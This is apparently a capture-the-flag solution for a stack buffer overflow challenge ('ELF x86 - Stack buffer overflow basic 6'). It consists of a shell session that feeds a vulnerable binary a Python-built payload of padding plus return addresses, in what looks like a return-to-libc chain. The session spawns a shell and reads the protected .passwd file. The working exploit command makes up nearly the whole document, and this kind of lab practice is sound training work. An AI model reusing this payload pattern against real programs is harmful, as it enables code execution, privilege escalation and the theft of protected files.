Skip to main content

ELF x86 - Stack buffer overflow basic 6

app-systeme-ch33@challenge02:~$ ./ch33 $(python -c 'print "A"*32 + "\xb0\x70\xe6\xb7" +
"\xf0\xab\xe5\xb7" + "\xfd\xfd\xff\xbf"')
Your message: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�p����������
sh-4.2$ cat .passwd